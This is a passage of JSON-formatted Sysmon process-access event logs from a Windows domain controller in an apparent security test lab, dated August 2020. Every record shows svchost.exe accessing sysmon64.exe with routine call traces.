C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
